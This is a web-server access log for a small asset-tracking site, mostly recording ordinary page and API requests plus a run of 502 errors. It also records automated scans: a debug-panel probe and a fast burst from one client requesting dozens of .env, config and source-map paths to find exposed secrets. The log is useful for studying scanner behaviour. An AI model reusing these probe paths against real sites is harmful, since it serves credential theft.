[14/Feb/2026:23:01:06 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/debug/default/view?panel=config" [Client 147.182.200.94] [Length 166] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:01:10 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:01:10 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:23:02:40 +0000] - - 301 - HEAD http asset.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:23:02:51 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:02:51 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:23:11:33 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:11:33 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:23:12:33 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:12:33 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:23:16:33 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:16:33 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:23:16:40 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:16:40 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:23:18:14 +0000] - - 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset-pilot] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:18:14 +0000] - - 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset-pilot] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:23:23:08 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 91.231.89.18] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-"
|
||||||
|
[14/Feb/2026:23:25:41 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:25:41 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:23:25:41 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:23:25:41 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:23:25:41 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 942] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:23:25:41 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:23:25:41 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:23:25:41 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:23:26:39 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 91.231.89.19] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-"
|
||||||
|
[14/Feb/2026:23:30:31 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 91.196.152.61] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-"
|
||||||
|
[14/Feb/2026:23:30:58 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/favicon.ico" [Client 91.196.152.61] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-"
|
||||||
|
[14/Feb/2026:23:36:54 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 63607] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:23:36:58 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:36:58 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 939] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:23:36:58 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:23:36:58 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:23:37:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 470] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:01:16 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 3.138.118.91] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0" "-"
|
||||||
|
[15/Feb/2026:00:05:48 +0000] - - 301 - HEAD http asset.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[15/Feb/2026:00:18:07 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 185.177.72.60] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:08 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 185.177.72.60] [Length 17770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:08 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/js/app.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:08 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/index.html" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:09 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/checkout" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:09 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/robots.txt" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:09 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/sitemap.xml" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:09 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:10 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:10 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.vite" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:11 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/backend/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:11 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/laravel/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:11 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/payment/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:11 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/admin/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:12 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.example" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:12 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/core/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:12 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:12 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/stripe/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:13 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.production" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:13 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.bak" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:13 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.local" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:14 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/assets/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:14 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/app/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:14 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:15 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/docker/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:15 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:15 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:15 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/main.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:16 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/main.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:16 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/env.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:16 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/env.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:16 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/app.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:17 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/app.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:17 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/constants.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:17 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/constants.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:18 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/bundle.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:18 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/bundle.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:18 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/index.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:18 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/index.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:19 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/@vite/client" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:19 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__env.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:19 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__env.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:19 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/vendor.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:20 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/vendor.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:20 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/stripe.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:20 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/stripe.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:20 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/checkout.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:21 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/checkout.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:21 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/payment.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:22 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/payment.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:22 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/sw.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:22 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/sw.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:23 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:23 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.json.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:23 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/env.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:23 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/env.json.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:24 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.vite/manifest.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:25 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.vite/manifest.json.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
